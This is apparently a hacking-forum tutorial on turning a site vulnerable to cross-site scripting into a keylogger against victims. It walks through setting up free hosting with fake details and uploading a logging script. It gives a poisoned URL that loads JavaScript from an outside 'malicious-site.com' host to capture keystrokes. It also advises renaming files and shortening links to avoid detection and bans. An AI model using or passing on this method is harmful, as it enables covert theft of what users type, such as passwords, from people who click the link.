Xss Keyloger using a website

hello guys! I originally came accross this script to records keypresses using a vulnerable site on another forum. I searched and found it had been posted here by the owner but it didn't seem to get many comments and I don't think many people are aware of this trick. The creator is Wiremask but the script has the credits left in.

Anyway, this tutorial will show you how to turn a vulnerable website into a keylogger that will log all keypresses once the victim has clicked on our poisoned link and types on the webpage. 

You need to have a website that is vulnerable to XSS injection, I won't go into that now because thats a whole different thing. So don't ask me "how to keylog facebook??"

1. 
Ok so the first thing we need to do is to create some web hosting. We need a host to host our keylogging script on it and this is what will be included in the poisoned url that we will send to people.

I will use hosting.eu.pn because they don't seem to suspend accounts but you can use any host like 00webhost etc.

Screenshot

Spoiler (Click to Hide)

Ok so if you don't have an account already click "SIGN UP" otherwise click login at the top.

2. 
Next select free hosting and click continue.

Screenshot

Spoiler (Click to Hide)

3. 
Select sign up.

Screenshot

Spoiler (Click to Hide)

A new form will appear, now just fill in some fake info but you need a real email address to active the account. Check the "I agree to the terms" box and click continue.

Screenshot

Spoiler (Click to Hide)

Now that should be done, you just need to wait for an activation email to login then your account will be active.

4. 
Once you have logged in click "website manager" at the top of the page.

Screenshot

Spoiler (Click to Hide)

Now click "File manager".

Screenshot

Spoiler (Click to Hide)

There will be two different type: lite and advanced but we can just use the lite file manager.

5. 
Now you will see all the files of your web site, I have done mine in a different folder to make things look neat but you can just do it in the home directory.

At the bottom you should see the name of your site, click on that.

Screenshot

Spoiler (Click to Hide)

Now we need to upload our files, so click on "browse" and select our two files logger.php and logger.js

Download link is at the bottom of the page!

Screenshot

Spoiler (Click to Hide)

Next we click on "Upload File(s)".

We also need a file for the keylogs to be written to, for this we will call it data.txt

Scroll down and in the create new file name box put "data.txt" and the click "Create File".

Remember all the files must be in the same folder!

Screenshot

Spoiler (Click to Hide)

6. 

Now we need to click on the edit button to the left hand side of the file next to save and delete. You can do this before you upload it in notepad or something.

Screenshot

Spoiler (Click to Hide)

Open the logger.js file and we need to edit the url to be the url to the php logger script.

The javascript is the file we will include in the poisoned url this will run and catch each keypress, it will then send them to the php script on our host that will right to the data.txt file. You can see how useful XSS can be.

Now we just need to set the permissions so all the files can work correctly.

Screenshot

Spoiler (Click to Hide)

Select all the files and set the permissions to 777 and click "set".

7. 
Now the setup is complete, all we have to do now is create our poisoned url using our vulnerable site, like this example below.

Code:

http://target.com/search.php?keywords=<script src="http://malicious-site.com/keylogger.js"></script>

As you can see our website has been inserted into the link of the vulnerable site. Now if someone clicks on that link everything they type in on that page will go to the data.txt file.

Here's an example below.

Screenshot

Spoiler (Click to View)

As you can see the url bar has our malicious link in it, at the bottom of the page Firefox shows us what sites we are connecting with. It says we are accepting scripts from eu.pn which is where our keylogger is hosted. 

Notice at the top right hand corner of the page there is a search bar, I type in there "hi there!", now we check our data.txt on our site...

Screenshot

Spoiler (Click to View)

And there you have it, it works!

End Of Tutorial

End Comments:

Thanks a lot for reading my tutorial!

Hopefully you will have learnt something from this and will have a better understanding of how cross site scripting works.

There's a few things you need to bare in mind when using this. Firstly as I said before the website has to be vulnerable to XSS injection for it to work.

The timer in the javascript logger is set to 1 second but you can set this to anything you want. The keylogger actually records capital letters and other special character keys.

Also this is meant for targeted attacks not for mass spreading as all the logs would get to jumbled up. 

A problem is that if someone leaves the page then you won't be able to receive logs any more.

Also please note that I called both the files "logger" because I thought if I uploaded a file called "keylogger" then it may get flagged up and my account banned.

Also remember that the person can see the url so try renaming files to like "search.js" etc. or using goo.gl to shorten urls to prevent being detected.

Download

Spoiler (Click to Hide)

http://sharesend.com/fnfie